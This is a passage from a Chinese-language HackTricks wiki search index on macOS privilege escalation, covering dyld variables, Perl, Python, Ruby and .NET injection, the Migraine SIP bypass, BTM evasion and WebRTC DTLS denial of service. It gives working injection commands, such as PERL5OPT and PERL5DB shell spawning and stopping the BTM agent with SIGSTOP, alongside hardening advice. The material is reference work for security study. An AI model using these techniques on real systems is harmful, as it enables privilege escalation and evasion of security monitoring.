/usr/lib/libSystem.B.dylib\\n[...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » 调试 dyld","id":"2519","title":"调试 dyld"},"252":{"body":"UDP端口分配: 当用户发起WebRTC通话时,媒体服务器为处理媒体流分配UDP端口,IP和端口通过信令进行通信。 ICE和STUN过程: 用户的浏览器使用ICE进行媒体同意验证,利用STUN确定到媒体服务器的连接路径。 DTLS会话: 在成功的STUN验证后,DTLS会话开始建立SRTP主密钥,切换到SRTP进行媒体流传输。","breadcrumbs":"Pentesting Network » WebRTC DoS » 漏洞来源","id":"252","title":"漏洞来源"},"2520":{"body":"DYLD_BIND_AT_LAUNCH: 懒惰绑定与非懒惰绑定一起解析 DYLD_DISABLE_PREFETCH: 禁用 __DATA 和 __LINKEDIT 内容的预取 DYLD_FORCE_FLAT_NAMESPACE: 单级绑定 DYLD_[FRAMEWORK/LIBRARY]_PATH | DYLD_FALLBACK_[FRAMEWORK/LIBRARY]_PATH | DYLD_VERSIONED_[FRAMEWORK/LIBRARY]_PATH: 解析路径 DYLD_INSERT_LIBRARIES: 加载特定库 DYLD_PRINT_TO_FILE: 将 dyld 调试写入文件 DYLD_PRINT_APIS: 打印 libdyld API 调用 DYLD_PRINT_APIS_APP: 打印主程序调用的 libdyld API DYLD_PRINT_BINDINGS: 打印绑定时的符号 DYLD_WEAK_BINDINGS: 仅在绑定时打印弱符号 DYLD_PRINT_CODE_SIGNATURES: 打印代码签名注册操作 DYLD_PRINT_DOFS: 打印加载的 D-Trace 对象格式部分 DYLD_PRINT_ENV: 打印 dyld 看到的环境 DYLD_PRINT_INTERPOSTING: 打印插入操作 
DYLD_PRINT_LIBRARIES: 打印加载的库 DYLD_PRINT_OPTS: 打印加载选项 DYLD_REBASING: 打印符号重基操作 DYLD_RPATHS: 打印 @rpath 的扩展 DYLD_PRINT_SEGMENTS: 打印 Mach-O 段的映射 DYLD_PRINT_STATISTICS: 打印时间统计 DYLD_PRINT_STATISTICS_DETAILS: 打印详细时间统计 DYLD_PRINT_WARNINGS: 打印警告信息 DYLD_SHARED_CACHE_DIR: 用于共享库缓存的路径 DYLD_SHARED_REGION: \\"use\\", \\"private\\", \\"avoid\\" DYLD_USE_CLOSURES: 启用闭包 可以通过类似的方式找到更多内容: bash strings /usr/lib/dyld | grep \\"^DYLD_\\" | sort -u 或从 https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz 下载 dyld 项目并在文件夹内运行: bash find . -type f | xargs grep strcmp| grep key,\\\\ \\\\\\" | cut -d\'\\"\' -f2 | sort -u","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » 其他","id":"2520","title":"其他"},"2521":{"body":"*OS Internals, Volume I: User Mode. By Jonathan Levin tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » 参考","id":"2521","title":"参考"},"2522":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Perl Applications Injection » macOS Perl Applications Injection","id":"2522","title":"macOS Perl Applications Injection"},"2523":{"body":"使用环境变量 PERL5OPT ,可以在解释器启动时(甚至在解析目标脚本的第一行之前)使 Perl 执行任意命令。 例如,创建这个脚本: test.pl #!/usr/bin/perl\\nprint \\"Hello from the Perl script!\\\\n\\"; 现在 导出环境变量 并执行 perl 脚本: bash export PERL5OPT=\'-Mwarnings;system(\\"whoami\\")\'\\nperl test.pl # This will execute \\"whoami\\" 另一个选项是创建一个 Perl 模块(例如 /tmp/pmod.pm): /tmp/pmod.pm #!/usr/bin/perl\\npackage pmod;\\nsystem(\'whoami\');\\n1; # Modules must return a true value 然后使用环境变量,以便模块能够自动定位和加载: bash PERL5LIB=/tmp/ PERL5OPT=-Mpmod perl victim.pl","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Perl Applications Injection » 通过 PERL5OPT 和 PERL5LIB 环境变量","id":"2523","title":"通过 PERL5OPT 和 PERL5LIB 环境变量"},"2524":{"body":"PERL5DB – 当解释器以 -d (调试器)标志启动时,PERL5DB 的内容会作为 Perl 代码在调试器上下文中执行。如果你可以影响特权 Perl 进程的环境 和 命令行标志,你可以做如下操作: bash export PERL5DB=\'system(\\"/bin/zsh\\")\'\\nsudo perl -d /usr/bin/some_admin_script.pl # 在执行脚本之前会打开一个 shell PERL5SHELL – 在 Windows 上,此变量控制 Perl 在需要生成 shell 时将使用哪个 shell 可执行文件。这里提到它只是为了完整性,因为在 macOS 上它并不相关。 尽管 PERL5DB 需要 -d 开关,但常见的维护或安装脚本以 root 身份执行时会启用此标志以进行详细故障排除,使该变量成为有效的提升向量。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Perl Applications Injection » 其他有趣的环境变量","id":"2524","title":"其他有趣的环境变量"},"2525":{"body":"可以通过运行以下命令列出 Perl 将搜索的包含路径 ( @INC ): bash perl -e \'print join(\\"\\\\n\\", @INC)\' 在 macOS 13/14 上的典型输出如下: bash 
/Library/Perl/5.30/darwin-thread-multi-2level\\n/Library/Perl/5.30\\n/Network/Library/Perl/5.30/darwin-thread-multi-2level\\n/Network/Library/Perl/5.30\\n/Library/Perl/Updates/5.30.3\\n/System/Library/Perl/5.30/darwin-thread-multi-2level\\n/System/Library/Perl/5.30\\n/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level\\n/System/Library/Perl/Extras/5.30 一些返回的文件夹甚至不存在,然而 /Library/Perl/5.30 确实存在, 不 受 SIP 保护,并且在 SIP 保护的文件夹之前。因此,如果你可以以 root 身份写入,你可以放置一个恶意模块(例如 File/Basename.pm),该模块将被任何导入该模块的特权脚本 优先 加载。 warning 你仍然需要 root 权限才能写入 /Library/Perl,macOS 会显示一个 TCC 提示,要求为执行写入操作的进程提供 完全磁盘访问 权限。 例如,如果一个脚本导入 use File::Basename; ,则可以创建 /Library/Perl/5.30/File/Basename.pm,其中包含攻击者控制的代码。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Perl Applications Injection » 通过依赖项(@INC 滥用)","id":"2525","title":"通过依赖项(@INC 滥用)"},"2526":{"body":"在 2023 年 5 月,微软披露了 CVE-2023-32369 ,昵称为 Migraine ,这是一种后期利用技术,允许 root 攻击者完全 绕过系统完整性保护 (SIP) 。 易受攻击的组件是 systemmigrationd ,这是一个具有 com.apple.rootless.install.heritable 权限的守护进程。该守护进程生成的任何子进程都继承该权限,因此在 SIP 限制之外运行。 研究人员识别出的子进程中包括 Apple 签名的解释器: /usr/bin/perl /usr/libexec/migrateLocalKDC … 因为 Perl 尊重 PERL5OPT(而 Bash 尊重 BASH_ENV),污染守护进程的 环境 足以在没有 SIP 的上下文中获得任意执行: bash # As root\\nlaunchctl setenv PERL5OPT \'-Mwarnings;system(\\"/private/tmp/migraine.sh\\")\' # Trigger a migration (or just wait – systemmigrationd will eventually spawn perl)\\nopen -a \\"Migration Assistant.app\\" # or programmatically invoke /System/Library/PrivateFrameworks/SystemMigration.framework/Resources/MigrationUtility 当 migrateLocalKDC 运行时,/usr/bin/perl 会在恶意的 PERL5OPT 下启动,并在 SIP 被重新启用之前执行 /private/tmp/migraine.sh。通过该脚本,你可以,例如,将有效负载复制到 /System/Library/LaunchDaemons 中,或分配 com.apple.rootless 扩展属性以使文件 不可删除 。 苹果在 macOS Ventura 13.4 、 Monterey 12.6.6 和 Big Sur 11.7.7 中修复了该问题,但较旧或未修补的系统仍然可以被利用。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Perl Applications Injection » 通过迁移助手绕过 SIP (CVE-2023-32369 
“Migraine”)","id":"2526","title":"通过迁移助手绕过 SIP (CVE-2023-32369 “Migraine”)"},"2527":{"body":"清除危险变量 – 特权的 launchdaemons 或 cron 作业应在干净的环境中启动(launchctl unsetenv PERL5OPT,env -i 等)。 避免以 root 身份运行解释器 ,除非绝对必要。使用编译的二进制文件或尽早降低权限。 使用 -T(污点模式)对供应商脚本进行处理 ,以便 Perl 在启用污点检查时忽略 PERL5OPT 和其他不安全的开关。 保持 macOS 更新 – “Migraine” 在当前版本中已完全修补。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Perl Applications Injection » 加固建议","id":"2527","title":"加固建议"},"2528":{"body":"Microsoft Security Blog – “新的 macOS 漏洞 Migraine 可能绕过系统完整性保护”(CVE-2023-32369),2023年5月30日。 Hackyboiz – “macOS SIP 绕过(PERL5OPT 和 BASH_ENV)研究”,2025年5月。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Perl Applications Injection » 参考文献","id":"2528","title":"参考文献"},"2529":{"body":"Reading time: 2 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Python Applications Injection » macOS Python 应用程序注入","id":"2529","title":"macOS Python 应用程序注入"},"253":{"body":"竞争条件利用: 攻击者可以通过在合法用户之前发送DTLS ClientHello消息来利用竞争条件,可能使用无效的密码套件如TLS_NULL_WITH_NULL_NULL。这会导致服务器出现DTLS错误,阻止SRTP会话的建立。","breadcrumbs":"Pentesting Network » WebRTC DoS » 利用机制","id":"253","title":"利用机制"},"2530":{"body":"可以更改这两个环境变量,以便在每次调用 python 时执行任意代码,例如: bash # Generate example python script\\necho \\"print(\'hi\')\\" > /tmp/script.py # RCE which will generate file /tmp/hacktricks\\nPYTHONWARNINGS=\\"all:0:antigravity.x:0:0\\" BROWSER=\\"/bin/sh -c \'touch /tmp/hacktricks\' #%s\\" python3 /tmp/script.py # RCE which will generate file /tmp/hacktricks bypassing \\"-I\\" injecting \\"-W\\" before the script to execute\\nBROWSER=\\"/bin/sh -c \'touch /tmp/hacktricks\' #%s\\" python3 -I -W all:0:antigravity.x:0:0 /tmp/script.py tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Python Applications Injection » 通过 PYTHONWARNINGS 和 BROWSER 环境变量","id":"2530","title":"通过 PYTHONWARNINGS 和 BROWSER 环境变量"},"2531":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Ruby Applications Injection » macOS Ruby Applications Injection","id":"2531","title":"macOS Ruby Applications Injection"},"2532":{"body":"使用这个环境变量,可以在每次执行 ruby 时 添加新参数 。虽然参数**-e 不能用于指定要执行的ruby代码,但可以使用参数 -I 和 -r 来添加一个新文件夹到库加载路径,然后 指定要加载的库**。 在**/tmp 中创建库 inject.rb**: inject.rb puts `whoami` 创建一个类似于以下的 Ruby 脚本: hello.rb puts \'Hello, World!\' 然后使用以下任意 Ruby 脚本加载它: bash RUBYOPT=\\"-I/tmp -rinject\\" ruby hello.rb 有趣的事实,即使使用参数 --disable-rubyopt 也有效: bash RUBYOPT=\\"-I/tmp -rinject\\" ruby hello.rb --disable-rubyopt tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Ruby Applications Injection » RUBYOPT","id":"2532","title":"RUBYOPT"},"2533":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 这是帖子 https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/ 的摘要。请查看以获取更多详细信息!","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS .Net Applications Injection » macOS .Net 应用程序注入","id":"2533","title":"macOS .Net 应用程序注入"},"2534":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS .Net Applications Injection » .NET Core 调试","id":"2534","title":".NET Core 调试"},"2535":{"body":"在 .NET 中,调试器与被调试程序之间的通信处理由 dbgtransportsession.cpp 管理。该组件为每个 .NET 进程设置两个命名管道,如 dbgtransportsession.cpp#L127 所示,这些管道通过 twowaypipe.cpp#L27 初始化。这些管道的后缀为 -in 和 -out 。 通过访问用户的 $TMPDIR ,可以找到可用于调试 .Net 应用程序的调试 FIFO。 DbgTransportSession::TransportWorker 负责管理来自调试器的通信。要启动新的调试会话,调试器必须通过 out 管道发送一条以 MessageHeader 结构开头的消息,该结构在 .NET 源代码中详细说明: c struct MessageHeader {\\nMessageType m_eType; // Message type\\nDWORD m_cbDataBlock; // Size of following data block (can be zero)\\nDWORD m_dwId; // Message ID from sender\\nDWORD m_dwReplyId; // Reply-to Message ID\\nDWORD m_dwLastSeenId; // Last seen Message ID by sender\\nDWORD m_dwReserved; // Reserved for future (initialize to zero)\\nunion {\\nstruct {\\nDWORD m_dwMajorVersion; // Requested/accepted protocol version\\nDWORD m_dwMinorVersion;\\n} VersionInfo;\\n...\\n} TypeSpecificData;\\nBYTE m_sMustBeZero[8];\\n} 要请求一个新会话,结构体如下填充,将消息类型设置为 MT_SessionRequest,并将协议版本设置为当前版本: c static const DWORD kCurrentMajorVersion = 2;\\nstatic const DWORD kCurrentMinorVersion = 0; // Configure the message type and version\\nsSendHeader.m_eType = MT_SessionRequest;\\nsSendHeader.TypeSpecificData.VersionInfo.m_dwMajorVersion = kCurrentMajorVersion;\\nsSendHeader.TypeSpecificData.VersionInfo.m_dwMinorVersion = kCurrentMinorVersion;\\nsSendHeader.m_cbDataBlock = sizeof(SessionRequestData); 该标题随后通过 write 系统调用发送到目标,后面是包含会话 GUID 的 sessionRequestData 结构: c write(wr, &sSendHeader, sizeof(MessageHeader));\\nmemset(&sDataBlock.m_sSessionID, 9, 
sizeof(SessionRequestData));\\nwrite(wr, &sDataBlock, sizeof(SessionRequestData)); 对out管道的读取操作确认调试会话建立的成功或失败: c read(rd, &sReceiveHeader, sizeof(MessageHeader));","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS .Net Applications Injection » 建立调试会话","id":"2535","title":"建立调试会话"},"2536":{"body":"一旦建立了调试会话,就可以使用 MT_ReadMemory 消息类型读取内存。函数 readMemory 进行了详细说明,执行发送读取请求和检索响应所需的步骤: c bool readMemory(void *addr, int len, unsigned char **output) {\\n// Allocation and initialization\\n...\\n// Write header and read response\\n...\\n// Read the memory from the debuggee\\n...\\nreturn true;\\n} 完整的概念验证(POC)可在 这里 获取。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS .Net Applications Injection » 读取内存","id":"2536","title":"读取内存"},"2537":{"body":"类似地,可以使用 writeMemory 函数写入内存。该过程涉及将消息类型设置为 MT_WriteMemory,指定数据的地址和长度,然后发送数据: c bool writeMemory(void *addr, int len, unsigned char *input) {\\n// Increment IDs, set message type, and specify memory location\\n...\\n// Write header and data, then read the response\\n...\\n// Confirm memory write was successful\\n...\\nreturn true;\\n} 相关的POC可以在 这里 找到。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS .Net Applications Injection » 写入内存","id":"2537","title":"写入内存"},"2538":{"body":"要执行代码,需要识别一个具有rwx权限的内存区域,这可以通过使用vmmap -pages:来完成。 bash vmmap -pages [pid]\\nvmmap -pages 35829 | grep \\"rwx/rwx\\" 定位一个覆盖函数指针的位置是必要的,在 .NET Core 中,可以通过针对 Dynamic Function Table (DFT) 来实现。这个表在 jithelpers.h 中详细描述,是运行时用于 JIT 编译辅助函数的。 对于 x64 系统,可以使用签名搜索来找到 libcorclr.dll 中符号 _hlpDynamicFuncTable 的引用。 MT_GetDCB 调试器函数提供了有用的信息,包括一个辅助函数的地址 m_helperRemoteStartAddr,指示 libcorclr.dll 在进程内存中的位置。然后使用这个地址开始搜索 DFT,并用 shellcode 的地址覆盖一个函数指针。 注入 PowerShell 的完整 POC 代码可以在 这里 访问。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS .Net Applications Injection » .NET Core代码执行","id":"2538","title":".NET 
Core代码执行"},"2539":{"body":"https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS .Net Applications Injection » References","id":"2539","title":"References"},"254":{"body":"端口扫描: 攻击者需要猜测哪些UDP端口正在处理传入的媒体会话,向这些端口发送带有空密码套件的ClientHello消息以触发漏洞。 攻击示意图: 该序列涉及攻击者向服务器发送多个ClientHello消息,夹杂着合法的信令和DTLS消息,导致由于错误的密码套件而握手失败。","breadcrumbs":"Pentesting Network » WebRTC DoS » 攻击过程","id":"254","title":"攻击过程"},"2540":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS 安全保护","id":"2540","title":"macOS 安全保护"},"2541":{"body":"Gatekeeper 通常用于指代 Quarantine + Gatekeeper + XProtect 的组合,这三个 macOS 安全模块将尝试 防止用户执行潜在恶意软件 。 更多信息请参见: macOS Gatekeeper / Quarantine / XProtect","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » Gatekeeper","id":"2541","title":"Gatekeeper"},"2542":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » 进程限制","id":"2542","title":"进程限制"},"2543":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » MACF","id":"2543","title":"MACF"},"2544":{"body":"macOS SIP","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » SIP - 系统完整性保护","id":"2544","title":"SIP - 系统完整性保护"},"2545":{"body":"MacOS 沙盒 限制应用程序 在沙盒内运行时的 允许操作,这些操作在沙盒配置文件中指定 。这有助于确保 应用程序仅访问预期的资源 。 macOS Sandbox","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » 沙盒","id":"2545","title":"沙盒"},"2546":{"body":"TCC (透明性、同意和控制) 是一个安全框架。它旨在 管理应用程序的权限 ,特别是通过调节它们对敏感功能的访问。这包括 位置服务、联系人、照片、麦克风、相机、辅助功能和完整磁盘访问 等元素。TCC 确保应用程序只能在获得用户明确同意后访问这些功能,从而增强对个人数据的隐私和控制。 macOS TCC","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » TCC - 透明性、同意和控制","id":"2546","title":"TCC - 透明性、同意和控制"},"2547":{"body":"macOS 中的启动约束是一种安全特性,用于 调节进程启动 ,通过定义 谁可以启动 进程、 如何 启动以及 从哪里 启动。该功能在 macOS Ventura 中引入,将系统二进制文件分类到信任缓存中的约束类别。每个可执行二进制文件都有设定的 启动规则 ,包括 自我 、 父级 和 责任 约束。扩展到第三方应用程序作为 macOS Sonoma 中的 环境 约束,这些功能通过管理进程启动条件来帮助减轻潜在的系统利用。 macOS Launch/Environment Constraints & Trust Cache","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » 启动/环境约束与信任缓存","id":"2547","title":"启动/环境约束与信任缓存"},"2548":{"body":"恶意软件移除工具 (MRT) 是 macOS 安全基础设施的另一个组成部分。顾名思义,MRT 的主要功能是 从感染的系统中移除已知恶意软件 。 一旦在 Mac 上检测到恶意软件(无论是通过 XProtect 还是其他方式),可以使用 MRT 自动 移除恶意软件 。MRT 
在后台静默运行,通常在系统更新或下载新恶意软件定义时运行(看起来 MRT 检测恶意软件的规则在二进制文件中)。 虽然 XProtect 和 MRT 都是 macOS 安全措施的一部分,但它们执行不同的功能: XProtect 是一种预防工具。它 检查下载的文件 (通过某些应用程序),如果检测到任何已知类型的恶意软件,它 阻止文件打开 ,从而防止恶意软件首先感染您的系统。 MRT 则是一个 反应工具 。它在系统检测到恶意软件后运行,旨在移除有问题的软件以清理系统。 MRT 应用程序位于 /Library/Apple/System/Library/CoreServices/MRT.app","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » MRT - 恶意软件移除工具","id":"2548","title":"MRT - 恶意软件移除工具"},"2549":{"body":"macOS 现在 **会在每次工具使用众所周知的 技术来保持代码执行 (如登录项、守护进程...)时发出警报,以便用户更好地了解 哪些软件在持续运行 。 这通过位于 /System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/backgroundtaskmanagementd 的 守护进程 和位于 /System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Support/BackgroundTaskManagementAgent.app 的 代理 运行。 backgroundtaskmanagementd 知道某些东西安装在持久文件夹中的方式是通过 获取 FSEvents 并为这些事件创建一些 处理程序 。 此外,还有一个 plist 文件,包含 众所周知的应用程序 ,这些应用程序经常保持由苹果维护,位于:/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/attributions.plist json [...]\\n\\"us.zoom.ZoomDaemon\\" => {\\n\\"AssociatedBundleIdentifiers\\" => [\\n0 => \\"us.zoom.xos\\"\\n]\\n\\"Attribution\\" => \\"Zoom\\"\\n\\"Program\\" => \\"/Library/PrivilegedHelperTools/us.zoom.ZoomDaemon\\"\\n\\"ProgramArguments\\" => [\\n0 => \\"/Library/PrivilegedHelperTools/us.zoom.ZoomDaemon\\"\\n]\\n\\"TeamIdentifier\\" => \\"BJ4HAAB9B3\\"\\n}\\n[...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » 背景任务管理","id":"2549","title":"背景任务管理"},"255":{"body":"安全测试: 使用像Scapy这样的工具,攻击者重放针对特定媒体端口的DTLS ClientHello消息。为了进行伦理测试,对Chromium进行修改(例如,JsepTransport::AddRemoteCandidates)以安全地模拟受害者行为。 缓解措施: 解决方案包括丢弃来自未验证地址的数据包,如在libnice等库的新版本中实现的那样。主要解决方案强调信任ICE验证过程,仅处理来自验证的IP和端口组合的数据包。","breadcrumbs":"Pentesting Network » WebRTC DoS » 测试和缓解","id":"255","title":"测试和缓解"},"2550":{"body":"可以使用 Apple cli 工具 枚举所有 配置的后台项目: bash # The tool will always ask for the users password\\nsfltool dumpbtm 此外,还可以使用 DumpBTM 列出这些信息。 bash # You need to grant 
the Terminal Full Disk Access for this to work\\nchmod +x dumpBTM\\nxattr -rc dumpBTM # Remove quarantine attr\\n./dumpBTM 此信息存储在 /private/var/db/com.apple.backgroundtaskmanagement/BackgroundItems-v4.btm 中,终端需要 FDA。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » 枚举","id":"2550","title":"枚举"},"2551":{"body":"当发现新的持久性时,会生成类型为 ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD 的事件。因此,任何 防止 该 事件 被发送或 代理不警告 用户的方法都将帮助攻击者 绕过 BTM。 重置数据库 :运行以下命令将重置数据库(应该从头开始重建),但是,由于某种原因,运行此命令后, 在系统重启之前不会警告任何新的持久性 。 需要 root 权限。 bash # Reset the database\\nsfltool resettbtm 停止代理 :可以向代理发送停止信号,以便它 不会在发现新检测时提醒用户 。 bash # Get PID\\npgrep BackgroundTaskManagementAgent\\n1011 # Stop it\\nkill -SIGSTOP 1011 # Check it\'s stopped (a T means it\'s stopped)\\nps -o state 1011\\nT 漏洞 :如果 创建持久性的进程在其后快速存在 ,守护进程将尝试 获取信息 , 失败 ,并且 无法发送事件 ,指示新的事物正在持久化。 参考和 关于BTM的更多信息 : https://youtu.be/9hjUmT031tc?t=26481 https://www.patreon.com/posts/new-developer-77420730?l=fr https://support.apple.com/en-gb/guide/deployment/depdca572563/web tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » 操作 BTM","id":"2551","title":"操作 BTM"},"2552":{"body":"Reading time: 32 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » macOS Gatekeeper / Quarantine / XProtect","id":"2552","title":"macOS Gatekeeper / Quarantine / XProtect"},"2553":{"body":"Gatekeeper 是为 Mac 操作系统开发的安全功能,旨在确保用户 仅运行受信任的软件 。它通过 验证用户下载并尝试从 App Store 以外的来源打开的软件 来实现,例如应用程序、插件或安装包。 Gatekeeper 的关键机制在于其 验证 过程。它检查下载的软件是否 由认可的开发者签名 ,以确保软件的真实性。此外,它还确认该软件是否 经过 Apple 的公证 ,以确保其不含已知的恶意内容,并且在公证后未被篡改。 此外,Gatekeeper 通过 提示用户首次批准打开 下载的软件来增强用户控制和安全性。此保护措施有助于防止用户无意中运行可能有害的可执行代码,这些代码可能被误认为是无害的数据文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / 